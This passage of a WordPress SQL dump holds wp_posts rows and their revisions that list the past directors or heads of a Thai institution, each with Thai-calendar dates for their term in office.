(553, 1, '2019-05-27 08:41:01', '2019-05-27 01:41:01', 'ร.อ.อ.เริ่ม บูรณฤกษ์\r\n\r\nดำรงตำแหน่ง วันที่ 1 เมษายน 2477 - 16 เมษายน 2478', 'ร.อ.อ.เริ่ม บูรณฤกษ์', '', 'publish', 'closed', 'open', '', '%e0%b8%a3-%e0%b8%ad-%e0%b8%ad-%e0%b9%80%e0%b8%a3%e0%b8%b4%e0%b9%88%e0%b8%a1-%e0%b8%9a%e0%b8%b9%e0%b8%a3%e0%b8%93%e0%b8%a4%e0%b8%81%e0%b8%a9%e0%b9%8c', '', '', '2019-05-27 08:41:01', '2019-05-27 01:41:01', '', 0, 'http://172.17.40.11/wp511/?p=553', 0, 'post', '', 0),
(554, 1, '2019-05-27 08:41:01', '2019-05-27 01:41:01', 'ร.อ.อ.เริ่ม บูรณฤกษ์\r\n\r\nดำรงตำแหน่ง วันที่ 1 เมษายน 2477 - 16 เมษายน 2478', 'ร.อ.อ.เริ่ม บูรณฤกษ์', '', 'inherit', 'closed', 'closed', '', '553-revision-v1', '', '', '2019-05-27 08:41:01', '2019-05-27 01:41:01', '', 553, 'http://172.17.40.11/wp511/?p=554', 0, 'revision', '', 0),
(555, 1, '2019-05-27 08:41:24', '2019-05-27 01:41:24', 'นายเปลื้อง  ณ นคร  (รักษาการแทน)\r\n\r\nดำรงตำแหน่ง  วันที่ 16 เมษายน 2478 - 26 กรกฏาคม 2478', 'นายเปลื้อง  ณ นคร  (รักษาการแทน)', '', 'publish', 'closed', 'open', '', '%e0%b8%99%e0%b8%b2%e0%b8%a2%e0%b9%80%e0%b8%9b%e0%b8%a5%e0%b8%b7%e0%b9%89%e0%b8%ad%e0%b8%87-%e0%b8%93-%e0%b8%99%e0%b8%84%e0%b8%a3-%e0%b8%a3%e0%b8%b1%e0%b8%81%e0%b8%a9%e0%b8%b2%e0%b8%81', '', '', '2019-05-27 08:41:24', '2019-05-27 01:41:24', '', 0, 'http://172.17.40.11/wp511/?p=555', 0, 'post', '', 0),
(556, 1, '2019-05-27 08:41:24', '2019-05-27 01:41:24', 'นายเปลื้อง  ณ นคร  (รักษาการแทน)\r\n\r\nดำรงตำแหน่ง  วันที่ 16 เมษายน 2478 - 26 กรกฏาคม 2478', 'นายเปลื้อง  ณ นคร  (รักษาการแทน)', '', 'inherit', 'closed', 'closed', '', '555-revision-v1', '', '', '2019-05-27 08:41:24', '2019-05-27 01:41:24', '', 555, 'http://172.17.40.11/wp511/?p=556', 0, 'revision', '', 0),
(557, 1, '2019-05-27 08:41:37', '2019-05-27 01:41:37', 'นายสวัสดิ์ วีรเดช\r\n\r\nดำรงตำแหน่ง วันที่ 27 กรกฏาคม 2478 - 17 พฤษภาคม 2482', 'นายสวัสดิ์ วีรเดช', '', 'publish', 'closed', 'open', '', '%e0%b8%99%e0%b8%b2%e0%b8%a2%e0%b8%aa%e0%b8%a7%e0%b8%b1%e0%b8%aa%e0%b8%94%e0%b8%b4%e0%b9%8c-%e0%b8%a7%e0%b8%b5%e0%b8%a3%e0%b9%80%e0%b8%94%e0%b8%8a', '', '', '2019-05-27 08:41:37', '2019-05-27 01:41:37', '', 0, 'http://172.17.40.11/wp511/?p=557', 0, 'post', '', 0),
(558, 1, '2019-05-27 08:41:37', '2019-05-27 01:41:37', 'นายสวัสดิ์ วีรเดช\r\n\r\nดำรงตำแหน่ง วันที่ 27 กรกฏาคม 2478 - 17 พฤษภาคม 2482', 'นายสวัสดิ์ วีรเดช', '', 'inherit', 'closed', 'closed', '', '557-revision-v1', '', '', '2019-05-27 08:41:37', '2019-05-27 01:41:37', '', 557, 'http://172.17.40.11/wp511/?p=558', 0, 'revision', '', 0),
(559, 1, '2019-05-27 08:41:50', '2019-05-27 01:41:50', 'นายเฉลิม สุขเวช\r\n\r\nดำรงตำแหน่ง วันที่ 18 พฤษภาคม 2482 - 12 พฤษภาคม 2483', 'นายเฉลิม สุขเวช', '', 'publish', 'closed', 'open', '', '%e0%b8%99%e0%b8%b2%e0%b8%a2%e0%b9%80%e0%b8%89%e0%b8%a5%e0%b8%b4%e0%b8%a1-%e0%b8%aa%e0%b8%b8%e0%b8%82%e0%b9%80%e0%b8%a7%e0%b8%8a', '', '', '2019-05-27 08:41:50', '2019-05-27 01:41:50', '', 0, 'http://172.17.40.11/wp511/?p=559', 0, 'post', '', 0),
(560, 1, '2019-05-27 08:41:50', '2019-05-27 01:41:50', 'นายเฉลิม สุขเวช\r\n\r\nดำรงตำแหน่ง วันที่ 18 พฤษภาคม 2482 - 12 พฤษภาคม 2483', 'นายเฉลิม สุขเวช', '', 'inherit', 'closed', 'closed', '', '559-revision-v1', '', '', '2019-05-27 08:41:50', '2019-05-27 01:41:50', '', 559, 'http://172.17.40.11/wp511/?p=560', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(561, 1, '2019-05-27 08:42:06', '2019-05-27 01:42:06', 'นายเทอด  สุวรรณคีรี  (รักษาการแทน)\r\n\r\nดำรงตำแหน่ง  วันที่ 13 พฤษภาคม 2483 - 10 มิถุนายน 2484', 'นายเทอด  สุวรรณคีรี  (รักษาการแทน)', '', 'publish', 'closed', 'open', '', '%e0%b8%99%e0%b8%b2%e0%b8%a2%e0%b9%80%e0%b8%97%e0%b8%ad%e0%b8%94-%e0%b8%aa%e0%b8%b8%e0%b8%a7%e0%b8%a3%e0%b8%a3%e0%b8%93%e0%b8%84%e0%b8%b5%e0%b8%a3%e0%b8%b5-%e0%b8%a3%e0%b8%b1%e0%b8%81', '', '', '2019-05-27 08:42:06', '2019-05-27 01:42:06', '', 0, 'http://172.17.40.11/wp511/?p=561', 0, 'post', '', 0),
(562, 1, '2019-05-27 08:42:06', '2019-05-27 01:42:06', 'นายเทอด  สุวรรณคีรี  (รักษาการแทน)\r\n\r\nดำรงตำแหน่ง  วันที่ 13 พฤษภาคม 2483 - 10 มิถุนายน 2484', 'นายเทอด  สุวรรณคีรี  (รักษาการแทน)', '', 'inherit', 'closed', 'closed', '', '561-revision-v1', '', '', '2019-05-27 08:42:06', '2019-05-27 01:42:06', '', 561, 'http://172.17.40.11/wp511/?p=562', 0, 'revision', '', 0),
(563, 1, '2019-05-27 08:42:21', '2019-05-27 01:42:21', 'นายธวัช รัตนพงศ์\r\n\r\nดำรงตำแหน่ง วันที่ 11 มิถุนายน 2484 - 13 ธันวาคม 2485', 'นายธวัช รัตนพงศ์', '', 'publish', 'closed', 'open', '', '%e0%b8%99%e0%b8%b2%e0%b8%a2%e0%b8%98%e0%b8%a7%e0%b8%b1%e0%b8%8a-%e0%b8%a3%e0%b8%b1%e0%b8%95%e0%b8%99%e0%b8%9e%e0%b8%87%e0%b8%a8%e0%b9%8c', '', '', '2019-05-27 08:42:21', '2019-05-27 01:42:21', '', 0, 'http://172.17.40.11/wp511/?p=563', 0, 'post', '', 0),
(564, 1, '2019-05-27 08:42:21', '2019-05-27 01:42:21', 'นายธวัช รัตนพงศ์\r\n\r\nดำรงตำแหน่ง วันที่ 11 มิถุนายน 2484 - 13 ธันวาคม 2485', 'นายธวัช รัตนพงศ์', '', 'inherit', 'closed', 'closed', '', '563-revision-v1', '', '', '2019-05-27 08:42:21', '2019-05-27 01:42:21', '', 563, 'http://172.17.40.11/wp511/?p=564', 0, 'revision', '', 0),
(565, 1, '2019-05-27 08:42:35', '2019-05-27 01:42:35', 'นายกลับ ส่งศรี\r\n\r\nดำรงตำแหน่ง วันที่ 14 ธันวาคม 2485 - 14 มิถุนายน 2489', 'นายกลับ ส่งศรี', '', 'publish', 'closed', 'open', '', '%e0%b8%99%e0%b8%b2%e0%b8%a2%e0%b8%81%e0%b8%a5%e0%b8%b1%e0%b8%9a-%e0%b8%aa%e0%b9%88%e0%b8%87%e0%b8%a8%e0%b8%a3%e0%b8%b5', '', '', '2019-05-27 08:42:35', '2019-05-27 01:42:35', '', 0, 'http://172.17.40.11/wp511/?p=565', 0, 'post', '', 0),
(566, 1, '2019-05-27 08:42:35', '2019-05-27 01:42:35', 'นายกลับ ส่งศรี\r\n\r\nดำรงตำแหน่ง วันที่ 14 ธันวาคม 2485 - 14 มิถุนายน 2489', 'นายกลับ ส่งศรี', '', 'inherit', 'closed', 'closed', '', '565-revision-v1', '', '', '2019-05-27 08:42:35', '2019-05-27 01:42:35', '', 565, 'http://172.17.40.11/wp511/?p=566', 0, 'revision', '', 0),
(567, 1, '2019-05-27 08:42:47', '2019-05-27 01:42:47', 'นายศรีพัท มีนะกนิษฐ์\r\n\r\nดำรงตำแหน่ง วันที่ 15 มิถุนายน 2489 - 7 พฤษภาคม 2493', 'นายศรีพัท มีนะกนิษฐ์', '', 'publish', 'closed', 'open', '', '%e0%b8%99%e0%b8%b2%e0%b8%a2%e0%b8%a8%e0%b8%a3%e0%b8%b5%e0%b8%9e%e0%b8%b1%e0%b8%97-%e0%b8%a1%e0%b8%b5%e0%b8%99%e0%b8%b0%e0%b8%81%e0%b8%99%e0%b8%b4%e0%b8%a9%e0%b8%90%e0%b9%8c', '', '', '2019-05-27 08:42:47', '2019-05-27 01:42:47', '', 0, 'http://172.17.40.11/wp511/?p=567', 0, 'post', '', 0),
(568, 1, '2019-05-27 08:42:47', '2019-05-27 01:42:47', 'นายศรีพัท มีนะกนิษฐ์\r\n\r\nดำรงตำแหน่ง วันที่ 15 มิถุนายน 2489 - 7 พฤษภาคม 2493', 'นายศรีพัท มีนะกนิษฐ์', '', 'inherit', 'closed', 'closed', '', '567-revision-v1', '', '', '2019-05-27 08:42:47', '2019-05-27 01:42:47', '', 567, 'http://172.17.40.11/wp511/?p=568', 0, 'revision', '', 0),
(569, 1, '2019-05-27 08:43:03', '2019-05-27 01:43:03', 'นายไปล่ สมิตเมฆ\r\n\r\nดำรงตำแหน่ง วันที่ 8 พฤษภาคม 2493 - 1 พฤษภาคม 2495', 'นายไปล่ สมิตเมฆ', '', 'publish', 'closed', 'open', '', '%e0%b8%99%e0%b8%b2%e0%b8%a2%e0%b9%84%e0%b8%9b%e0%b8%a5%e0%b9%88-%e0%b8%aa%e0%b8%a1%e0%b8%b4%e0%b8%95%e0%b9%80%e0%b8%a1%e0%b8%86', '', '', '2019-05-27 08:43:03', '2019-05-27 01:43:03', '', 0, 'http://172.17.40.11/wp511/?p=569', 0, 'post', '', 0),
(570, 1, '2019-05-27 08:43:03', '2019-05-27 01:43:03', 'นายไปล่ สมิตเมฆ\r\n\r\nดำรงตำแหน่ง วันที่ 8 พฤษภาคม 2493 - 1 พฤษภาคม 2495', 'นายไปล่ สมิตเมฆ', '', 'inherit', 'closed', 'closed', '', '569-revision-v1', '', '', '2019-05-27 08:43:03', '2019-05-27 01:43:03', '', 569, 'http://172.17.40.11/wp511/?p=570', 0, 'revision', '', 0),
(571, 1, '2019-05-27 08:43:19', '2019-05-27 01:43:19', 'นายแช่ม ไวทยินท์\r\n\r\nดำรงตำแหน่ง วันที่ 2 พฤษภาคม 2495 - 13 กรกฏาคม 2499', 'นายแช่ม ไวทยินท์', '', 'publish', 'closed', 'open', '', '%e0%b8%99%e0%b8%b2%e0%b8%a2%e0%b9%81%e0%b8%8a%e0%b9%88%e0%b8%a1-%e0%b9%84%e0%b8%a7%e0%b8%97%e0%b8%a2%e0%b8%b4%e0%b8%99%e0%b8%97%e0%b9%8c', '', '', '2019-05-27 08:43:19', '2019-05-27 01:43:19', '', 0, 'http://172.17.40.11/wp511/?p=571', 0, 'post', '', 0),
(572, 1, '2019-05-27 08:43:19', '2019-05-27 01:43:19', 'นายแช่ม ไวทยินท์\r\n\r\nดำรงตำแหน่ง วันที่ 2 พฤษภาคม 2495 - 13 กรกฏาคม 2499', 'นายแช่ม ไวทยินท์', '', 'inherit', 'closed', 'closed', '', '571-revision-v1', '', '', '2019-05-27 08:43:19', '2019-05-27 01:43:19', '', 571, 'http://172.17.40.11/wp511/?p=572', 0, 'revision', '', 0),
(573, 1, '2019-05-27 08:43:31', '2019-05-27 01:43:31', 'นายกลิ่น รสิตานนท์ (รักษาการแทน)\r\nดำรงตำแหน่ง วันที่ 14 กรกฏาคม 2499 - 25 มิถุนายน 2500', 'นายกลิ่น รสิตานนท์ (รักษาการแทน)', '', 'publish', 'closed', 'open', '', '%e0%b8%99%e0%b8%b2%e0%b8%a2%e0%b8%81%e0%b8%a5%e0%b8%b4%e0%b9%88%e0%b8%99-%e0%b8%a3%e0%b8%aa%e0%b8%b4%e0%b8%95%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%97%e0%b9%8c-%e0%b8%a3%e0%b8%b1%e0%b8%81%e0%b8%a9', '', '', '2019-05-27 08:43:31', '2019-05-27 01:43:31', '', 0, 'http://172.17.40.11/wp511/?p=573', 0, 'post', '', 0),
(574, 1, '2019-05-27 08:43:31', '2019-05-27 01:43:31', 'นายกลิ่น รสิตานนท์ (รักษาการแทน)\r\nดำรงตำแหน่ง วันที่ 14 กรกฏาคม 2499 - 25 มิถุนายน 2500', 'นายกลิ่น รสิตานนท์ (รักษาการแทน)', '', 'inherit', 'closed', 'closed', '', '573-revision-v1', '', '', '2019-05-27 08:43:31', '2019-05-27 01:43:31', '', 573, 'http://172.17.40.11/wp511/?p=574', 0, 'revision', '', 0),
(575, 1, '2019-05-27 08:43:43', '2019-05-27 01:43:43', 'นายศรีพัท มีนะกนิษฐ์ (รักษาการแทน)\r\nดำรงตำแหน่ง วันที่ 26 มิถุนายน 2500 - 20 มิถุนายน 2501', 'นายศรีพัท มีนะกนิษฐ์ (รักษาการแทน)', '', 'publish', 'closed', 'open', '', '%e0%b8%99%e0%b8%b2%e0%b8%a2%e0%b8%a8%e0%b8%a3%e0%b8%b5%e0%b8%9e%e0%b8%b1%e0%b8%97-%e0%b8%a1%e0%b8%b5%e0%b8%99%e0%b8%b0%e0%b8%81%e0%b8%99%e0%b8%b4%e0%b8%a9%e0%b8%90%e0%b9%8c-%e0%b8%a3%e0%b8%b1', '', '', '2019-05-27 08:43:43', '2019-05-27 01:43:43', '', 0, 'http://172.17.40.11/wp511/?p=575', 0, 'post', '', 0),
(576, 1, '2019-05-27 08:43:43', '2019-05-27 01:43:43', 'นายศรีพัท มีนะกนิษฐ์ (รักษาการแทน)\r\nดำรงตำแหน่ง วันที่ 26 มิถุนายน 2500 - 20 มิถุนายน 2501', 'นายศรีพัท มีนะกนิษฐ์ (รักษาการแทน)', '', 'inherit', 'closed', 'closed', '', '575-revision-v1', '', '', '2019-05-27 08:43:43', '2019-05-27 01:43:43', '', 575, 'http://172.17.40.11/wp511/?p=576', 0, 'revision', '', 0),
(577, 1, '2019-05-27 08:44:06', '2019-05-27 01:44:06', 'นายวิศาล  ศิวารัตน์\r\n\r\nดำรงตำแหน่ง  วันที่ 21 มิถุนายน 2501 - 16 พฤษภาคม 2503', 'นายวิศาล  ศิวารัตน์', '', 'publish', 'closed', 'open', '', '%e0%b8%99%e0%b8%b2%e0%b8%a2%e0%b8%a7%e0%b8%b4%e0%b8%a8%e0%b8%b2%e0%b8%a5-%e0%b8%a8%e0%b8%b4%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%b1%e0%b8%95%e0%b8%99%e0%b9%8c', '', '', '2019-05-27 08:44:06', '2019-05-27 01:44:06', '', 0, 'http://172.17.40.11/wp511/?p=577', 0, 'post', '', 0),
(578, 1, '2019-05-27 08:44:06', '2019-05-27 01:44:06', 'นายวิศาล  ศิวารัตน์\r\n\r\nดำรงตำแหน่ง  วันที่ 21 มิถุนายน 2501 - 16 พฤษภาคม 2503', 'นายวิศาล  ศิวารัตน์', '', 'inherit', 'closed', 'closed', '', '577-revision-v1', '', '', '2019-05-27 08:44:06', '2019-05-27 01:44:06', '', 577, 'http://172.17.40.11/wp511/?p=578', 0, 'revision', '', 0),
(579, 1, '2019-05-27 08:44:19', '2019-05-27 01:44:19', 'นายจรูญ มิลินทร์\r\n\r\nดำรงตำแหน่ง วันที่ 17 พฤษภาคม 2503 - 19 กรกฏาคม 2508', 'นายจรูญ มิลินทร์', '', 'publish', 'closed', 'open', '', '%e0%b8%99%e0%b8%b2%e0%b8%a2%e0%b8%88%e0%b8%a3%e0%b8%b9%e0%b8%8d-%e0%b8%a1%e0%b8%b4%e0%b8%a5%e0%b8%b4%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b9%8c', '', '', '2019-05-27 08:44:19', '2019-05-27 01:44:19', '', 0, 'http://172.17.40.11/wp511/?p=579', 0, 'post', '', 0),
(580, 1, '2019-05-27 08:44:19', '2019-05-27 01:44:19', 'นายจรูญ มิลินทร์\r\n\r\nดำรงตำแหน่ง วันที่ 17 พฤษภาคม 2503 - 19 กรกฏาคม 2508', 'นายจรูญ มิลินทร์', '', 'inherit', 'closed', 'closed', '', '579-revision-v1', '', '', '2019-05-27 08:44:19', '2019-05-27 01:44:19', '', 579, 'http://172.17.40.11/wp511/?p=580', 0, 'revision', '', 0),
(581, 1, '2019-05-27 08:44:33', '2019-05-27 01:44:33', 'นายสกล นิลวรรณ\r\n\r\nดำรงตำแหน่ง วันที่ 20 พฤษภาคม 2508 - 31 มกราคม 2509', 'นายสกล นิลวรรณ', '', 'publish', 'closed', 'open', '', '%e0%b8%99%e0%b8%b2%e0%b8%a2%e0%b8%aa%e0%b8%81%e0%b8%a5-%e0%b8%99%e0%b8%b4%e0%b8%a5%e0%b8%a7%e0%b8%a3%e0%b8%a3%e0%b8%93', '', '', '2019-05-27 08:44:33', '2019-05-27 01:44:33', '', 0, 'http://172.17.40.11/wp511/?p=581', 0, 'post', '', 0),
(582, 1, '2019-05-27 08:44:33', '2019-05-27 01:44:33', 'นายสกล นิลวรรณ\r\n\r\nดำรงตำแหน่ง วันที่ 20 พฤษภาคม 2508 - 31 มกราคม 2509', 'นายสกล นิลวรรณ', '', 'inherit', 'closed', 'closed', '', '581-revision-v1', '', '', '2019-05-27 08:44:33', '2019-05-27 01:44:33', '', 581, 'http://172.17.40.11/wp511/?p=582', 0, 'revision', '', 0),
(583, 1, '2019-05-27 08:44:46', '2019-05-27 01:44:46', 'น.ส.สมบุญ ศรียาภัย\r\n\r\nดำรงตำแหน่ง วันที่ 1 กุมภาพันธ์ 2509 - 30 กันยายน 2523', 'น.ส.สมบุญ ศรียาภัย', '', 'publish', 'closed', 'open', '', '%e0%b8%99-%e0%b8%aa-%e0%b8%aa%e0%b8%a1%e0%b8%9a%e0%b8%b8%e0%b8%8d-%e0%b8%a8%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%b2%e0%b8%a0%e0%b8%b1%e0%b8%a2', '', '', '2019-05-27 08:44:46', '2019-05-27 01:44:46', '', 0, 'http://172.17.40.11/wp511/?p=583', 0, 'post', '', 0),
(584, 1, '2019-05-27 08:44:46', '2019-05-27 01:44:46', 'น.ส.สมบุญ ศรียาภัย\r\n\r\nดำรงตำแหน่ง วันที่ 1 กุมภาพันธ์ 2509 - 30 กันยายน 2523', 'น.ส.สมบุญ ศรียาภัย', '', 'inherit', 'closed', 'closed', '', '583-revision-v1', '', '', '2019-05-27 08:44:46', '2019-05-27 01:44:46', '', 583, 'http://172.17.40.11/wp511/?p=584', 0, 'revision', '', 0),
(585, 1, '2019-05-27 08:44:59', '2019-05-27 01:44:59', 'ดร.วิจิตร จันทรากุล\r\n\r\nดำรงตำแหน่ง วันที่ 1 ตุลาคม 2523 - 3 เมาายน 2527', 'ดร.วิจิตร จันทรากุล', '', 'publish', 'closed', 'open', '', '%e0%b8%94%e0%b8%a3-%e0%b8%a7%e0%b8%b4%e0%b8%88%e0%b8%b4%e0%b8%95%e0%b8%a3-%e0%b8%88%e0%b8%b1%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b8%b2%e0%b8%81%e0%b8%b8%e0%b8%a5', '', '', '2019-05-27 08:44:59', '2019-05-27 01:44:59', '', 0, 'http://172.17.40.11/wp511/?p=585', 0, 'post', '', 0),
(586, 1, '2019-05-27 08:44:59', '2019-05-27 01:44:59', 'ดร.วิจิตร จันทรากุล\r\n\r\nดำรงตำแหน่ง วันที่ 1 ตุลาคม 2523 - 3 เมาายน 2527', 'ดร.วิจิตร จันทรากุล', '', 'inherit', 'closed', 'closed', '', '585-revision-v1', '', '', '2019-05-27 08:44:59', '2019-05-27 01:44:59', '', 585, 'http://172.17.40.11/wp511/?p=586', 0, 'revision', '', 0),
(587, 1, '2019-05-27 08:45:16', '2019-05-27 01:45:16', 'ผศ.วิชิต หลักทรัพย์ (รักษาการแทน)\r\nดำรงตำแหน่ง วันที่ 3 เมษายน 2527 - 15 ตุลาคม 2527', 'ผศ.วิชิต หลักทรัพย์ (รักษาการแทน)', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%a8-%e0%b8%a7%e0%b8%b4%e0%b8%8a%e0%b8%b4%e0%b8%95-%e0%b8%ab%e0%b8%a5%e0%b8%b1%e0%b8%81%e0%b8%97%e0%b8%a3%e0%b8%b1%e0%b8%9e%e0%b8%a2%e0%b9%8c-%e0%b8%a3%e0%b8%b1%e0%b8%81%e0%b8%a9', '', '', '2019-05-27 08:45:16', '2019-05-27 01:45:16', '', 0, 'http://172.17.40.11/wp511/?p=587', 0, 'post', '', 0),
(588, 1, '2019-05-27 08:45:16', '2019-05-27 01:45:16', 'ผศ.วิชิต หลักทรัพย์ (รักษาการแทน)\r\nดำรงตำแหน่ง วันที่ 3 เมษายน 2527 - 15 ตุลาคม 2527', 'ผศ.วิชิต หลักทรัพย์ (รักษาการแทน)', '', 'inherit', 'closed', 'closed', '', '587-revision-v1', '', '', '2019-05-27 08:45:16', '2019-05-27 01:45:16', '', 587, 'http://172.17.40.11/wp511/?p=588', 0, 'revision', '', 0),
(589, 1, '2019-05-27 08:45:29', '2019-05-27 01:45:29', 'ดร.จรินทร์ ชาติรุ่ง\r\n\r\nดำรงตำแหน่ง วันที่ 15 ตุลาคม 2527 - 30 กันยายน 2531', 'ดร.จรินทร์ ชาติรุ่ง', '', 'publish', 'closed', 'open', '', '%e0%b8%94%e0%b8%a3-%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b9%8c-%e0%b8%8a%e0%b8%b2%e0%b8%95%e0%b8%b4%e0%b8%a3%e0%b8%b8%e0%b9%88%e0%b8%87-2', '', '', '2019-05-27 08:45:29', '2019-05-27 01:45:29', '', 0, 'http://172.17.40.11/wp511/?p=589', 0, 'post', '', 0),
(590, 1, '2019-05-27 08:45:29', '2019-05-27 01:45:29', 'ดร.จรินทร์ ชาติรุ่ง\r\n\r\nดำรงตำแหน่ง วันที่ 15 ตุลาคม 2527 - 30 กันยายน 2531', 'ดร.จรินทร์ ชาติรุ่ง', '', 'inherit', 'closed', 'closed', '', '589-revision-v1', '', '', '2019-05-27 08:45:29', '2019-05-27 01:45:29', '', 589, 'http://172.17.40.11/wp511/?p=590', 0, 'revision', '', 0),
(591, 1, '2019-05-27 08:45:44', '2019-05-27 01:45:44', 'ดร.วิชัย  รัตนากีรณวร\r\n\r\nดำรงตำแหน่ง  วันที่ 1 ตุลาคม 2531 - 30 กันยายน 2535', 'ดร.วิชัย  รัตนากีรณวร', '', 'publish', 'closed', 'open', '', '%e0%b8%94%e0%b8%a3-%e0%b8%a7%e0%b8%b4%e0%b8%8a%e0%b8%b1%e0%b8%a2-%e0%b8%a3%e0%b8%b1%e0%b8%95%e0%b8%99%e0%b8%b2%e0%b8%81%e0%b8%b5%e0%b8%a3%e0%b8%93%e0%b8%a7%e0%b8%a3', '', '', '2019-05-27 08:45:44', '2019-05-27 01:45:44', '', 0, 'http://172.17.40.11/wp511/?p=591', 0, 'post', '', 0),
(592, 1, '2019-05-27 08:45:44', '2019-05-27 01:45:44', 'ดร.วิชัย  รัตนากีรณวร\r\n\r\nดำรงตำแหน่ง  วันที่ 1 ตุลาคม 2531 - 30 กันยายน 2535', 'ดร.วิชัย  รัตนากีรณวร', '', 'inherit', 'closed', 'closed', '', '591-revision-v1', '', '', '2019-05-27 08:45:44', '2019-05-27 01:45:44', '', 591, 'http://172.17.40.11/wp511/?p=592', 0, 'revision', '', 0),
(593, 1, '2019-05-27 08:45:58', '2019-05-27 01:45:58', 'ผศ.สุเทพ ทิพย์ธารา (รักษาการแทน)\r\n\r\nดำรงตำแหน่ง วันที่ 9 มิถุนายน 2546 - 6 กรกฏาคม 2546', 'ผศ.สุเทพ ทิพย์ธารา (รักษาการแทน)', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%a8-%e0%b8%aa%e0%b8%b8%e0%b9%80%e0%b8%97%e0%b8%9e-%e0%b8%97%e0%b8%b4%e0%b8%9e%e0%b8%a2%e0%b9%8c%e0%b8%98%e0%b8%b2%e0%b8%a3%e0%b8%b2-%e0%b8%a3%e0%b8%b1%e0%b8%81%e0%b8%a9%e0%b8%b2', '', '', '2019-05-27 08:45:58', '2019-05-27 01:45:58', '', 0, 'http://172.17.40.11/wp511/?p=593', 0, 'post', '', 0),
(594, 1, '2019-05-27 08:45:58', '2019-05-27 01:45:58', 'ผศ.สุเทพ ทิพย์ธารา (รักษาการแทน)\r\n\r\nดำรงตำแหน่ง วันที่ 9 มิถุนายน 2546 - 6 กรกฏาคม 2546', 'ผศ.สุเทพ ทิพย์ธารา (รักษาการแทน)', '', 'inherit', 'closed', 'closed', '', '593-revision-v1', '', '', '2019-05-27 08:45:58', '2019-05-27 01:45:58', '', 593, 'http://172.17.40.11/wp511/?p=594', 0, 'revision', '', 0),
(595, 1, '2019-05-27 08:46:13', '2019-05-27 01:46:13', 'ผศ.ดร.นิวัต  กลิ่นงาม\r\n\r\nดำรงตำแหน่ง  วันที่  1 ตุลาคม 2535 - 8 มิถุนายน 2542', 'ผศ.ดร.นิวัต  กลิ่นงาม', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%a8-%e0%b8%94%e0%b8%a3-%e0%b8%99%e0%b8%b4%e0%b8%a7%e0%b8%b1%e0%b8%95-%e0%b8%81%e0%b8%a5%e0%b8%b4%e0%b9%88%e0%b8%99%e0%b8%87%e0%b8%b2%e0%b8%a1', '', '', '2019-05-27 08:46:13', '2019-05-27 01:46:13', '', 0, 'http://172.17.40.11/wp511/?p=595', 0, 'post', '', 0),
(596, 1, '2019-05-27 08:46:13', '2019-05-27 01:46:13', 'ผศ.ดร.นิวัต  กลิ่นงาม\r\n\r\nดำรงตำแหน่ง  วันที่  1 ตุลาคม 2535 - 8 มิถุนายน 2542', 'ผศ.ดร.นิวัต  กลิ่นงาม', '', 'inherit', 'closed', 'closed', '', '595-revision-v1', '', '', '2019-05-27 08:46:13', '2019-05-27 01:46:13', '', 595, 'http://172.17.40.11/wp511/?p=596', 0, 'revision', '', 0),
(597, 1, '2019-05-27 08:46:26', '2019-05-27 01:46:26', 'ผศ.นิรัตน์  จรจิตร\r\n\r\nดำรงตำแหน่งวันที่  9 มิถุนายน 2542 - 8 มิถุนายน 2546', 'ผศ.นิรัตน์  จรจิตร', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%a8-%e0%b8%99%e0%b8%b4%e0%b8%a3%e0%b8%b1%e0%b8%95%e0%b8%99%e0%b9%8c-%e0%b8%88%e0%b8%a3%e0%b8%88%e0%b8%b4%e0%b8%95%e0%b8%a3', '', '', '2019-05-27 08:46:26', '2019-05-27 01:46:26', '', 0, 'http://172.17.40.11/wp511/?p=597', 0, 'post', '', 0),
(598, 1, '2019-05-27 08:46:26', '2019-05-27 01:46:26', 'ผศ.นิรัตน์  จรจิตร\r\n\r\nดำรงตำแหน่งวันที่  9 มิถุนายน 2542 - 8 มิถุนายน 2546', 'ผศ.นิรัตน์  จรจิตร', '', 'inherit', 'closed', 'closed', '', '597-revision-v1', '', '', '2019-05-27 08:46:26', '2019-05-27 01:46:26', '', 597, 'http://172.17.40.11/wp511/?p=598', 0, 'revision', '', 0),
(599, 1, '2019-05-27 08:46:39', '2019-05-27 01:46:39', 'ผศ.ดร.ไพโรจน์ ด้วงวิเศษ\r\n\r\nดำรงตำแหน่งวันที่  7 กรกฏาคม 2546 - 26 กุมภาพันธ์ 2556', 'ผศ.ดร.ไพโรจน์ ด้วงวิเศษ', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%a8-%e0%b8%94%e0%b8%a3-%e0%b9%84%e0%b8%9e%e0%b9%82%e0%b8%a3%e0%b8%88%e0%b8%99%e0%b9%8c-%e0%b8%94%e0%b9%89%e0%b8%a7%e0%b8%87%e0%b8%a7%e0%b8%b4%e0%b9%80%e0%b8%a8%e0%b8%a9', '', '', '2019-05-27 08:46:39', '2019-05-27 01:46:39', '', 0, 'http://172.17.40.11/wp511/?p=599', 0, 'post', '', 0),
(600, 1, '2019-05-27 08:46:39', '2019-05-27 01:46:39', 'ผศ.ดร.ไพโรจน์ ด้วงวิเศษ\r\n\r\nดำรงตำแหน่งวันที่  7 กรกฏาคม 2546 - 26 กุมภาพันธ์ 2556', 'ผศ.ดร.ไพโรจน์ ด้วงวิเศษ', '', 'inherit', 'closed', 'closed', '', '599-revision-v1', '', '', '2019-05-27 08:46:39', '2019-05-27 01:46:39', '', 599, 'http://172.17.40.11/wp511/?p=600', 0, 'revision', '', 0),
